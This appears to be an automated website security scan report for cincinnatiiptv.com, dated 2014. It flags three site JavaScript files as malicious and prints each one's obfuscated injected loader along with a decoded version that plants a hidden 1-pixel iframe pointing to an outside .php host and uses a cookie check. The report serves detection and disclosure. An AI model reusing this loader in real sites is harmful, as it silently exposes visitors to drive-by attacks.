Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cincinnatiiptv.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cincinnatiiptv.com/ | 200 OK Content-Length: 21452 Content-Type: text/html | clean |
http://cincinnatiiptv.com/embed/swfobject.js | 200 OK Content-Length: 15116 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) xamh="y";hwzrl="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[hwzrl].body)==null}()}catch(icvyy){tebpem=function(wpvg){wpvg="fr"+"omCh"+wpvg;for(bctoxc=0;bctoxc<xamh.length;bctoxc++){pnk+=String[wpvg](jgc(arc+(xamh[bctoxc]))-(113));}};};jgc=(window.eval);arc="0x";pbixq=0;try{;}catch(hrz){pbixq=1}if(!pbixq){try{++jgc(hwzrl)["\x62o"+"d"+xamh]}catch(icvyy){zrsg="^";}xamh="91^d7^e6^df^d4^e5^da^e0^df^91^e0^e4^e5^e3^de^a1^aa^99^9a^91^ec^7e^7b^91^e7^d2^e3^91^e4^e5^d2^e5^d Decoded script: String String function zzzfff() { var ztba = document.createElement('iframe'); ztba.src = 'http://lioton.com.hk/images/CNpP4tk7.php'; ztba.style.position = 'absolute'; ztba.style.border = '0'; ztba.style.height = '1px'; ztba.style.width = '1px'; ztba.style.left = '1px'; ztba.style.top = '1px'; if (!document.getElementById('ztba')) { document.write('<div id=\'ztba\'></div>'); document.getElemen ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://cincinnatiiptv.com/embed/javascript.js | 200 OK Content-Length: 18998 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) xamh="y";hwzrl="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[hwzrl].body)==null}()}catch(icvyy){tebpem=function(wpvg){wpvg="fr"+"omCh"+wpvg;for(bctoxc=0;bctoxc<xamh.length;bctoxc++){pnk+=String[wpvg](jgc(arc+(xamh[bctoxc]))-(113));}};};jgc=(window.eval);arc="0x";pbixq=0;try{;}catch(hrz){pbixq=1}if(!pbixq){try{++jgc(hwzrl)["\x62o"+"d"+xamh]}catch(icvyy){zrsg="^";}xamh="91^d7^e6^df^d4^e5^da^e0^df^91^e0^e4^e5^e3^de^a1^aa^99^9a^91^ec^7e^7b^91^e7^d2^e3^91^e4^e5^d2^e5^d Decoded script: String String function zzzfff() { var ztba = document.createElement('iframe'); ztba.src = 'http://lioton.com.hk/images/CNpP4tk7.php'; ztba.style.position = 'absolute'; ztba.style.border = '0'; ztba.style.height = '1px'; ztba.style.width = '1px'; ztba.style.left = '1px'; ztba.style.top = '1px'; if (!document.getElementById('ztba')) { document.write('<div id=\'ztba\'></div>'); document.getElemen ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://cincinnatiiptv.com/embed/urchin.js | 200 OK Content-Length: 29649 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) xamh="y";hwzrl="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[hwzrl].body)==null}()}catch(icvyy){tebpem=function(wpvg){wpvg="fr"+"omCh"+wpvg;for(bctoxc=0;bctoxc<xamh.length;bctoxc++){pnk+=String[wpvg](jgc(arc+(xamh[bctoxc]))-(113));}};};jgc=(window.eval);arc="0x";pbixq=0;try{;}catch(hrz){pbixq=1}if(!pbixq){try{++jgc(hwzrl)["\x62o"+"d"+xamh]}catch(icvyy){zrsg="^";}xamh="91^d7^e6^df^d4^e5^da^e0^df^91^e0^e4^e5^e3^de^a1^aa^99^9a^91^ec^7e^7b^91^e7^d2^e3^91^e4^e5^d2^e5^d Decoded script: String String function zzzfff() { var ztba = document.createElement('iframe'); ztba.src = 'http://lioton.com.hk/images/CNpP4tk7.php'; ztba.style.position = 'absolute'; ztba.style.border = '0'; ztba.style.height = '1px'; ztba.style.width = '1px'; ztba.style.left = '1px'; ztba.style.top = '1px'; if (!document.getElementById('ztba')) { document.write('<div id=\'ztba\'></div>'); document.getElemen ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://cincinnatiiptv.com/../../Scripts/AC_RunActiveContent.js | 500 Status read failed: Соединение ÑазоÑвано дÑÑгой ÑÑоÑоной Content-Length: 140 Content-Type: text/plain | clean |
http://cincinnatiiptv.com/test404page.js | 404 Not Found Content-Length: 1442 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cincinnatiiptv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 09:08:23 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 21452
Content-Type: text/html
...21452 bytes of data.
GET / HTTP/1.1
Host: cincinnatiiptv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 09:08:23 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 21452
Content-Type: text/html
...21452 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cincinnatiiptv.com
Referer: http://www.google.com/search?q=cincinnatiiptv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cincinnatiiptv.com
Referer: http://www.google.com/search?q=cincinnatiiptv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.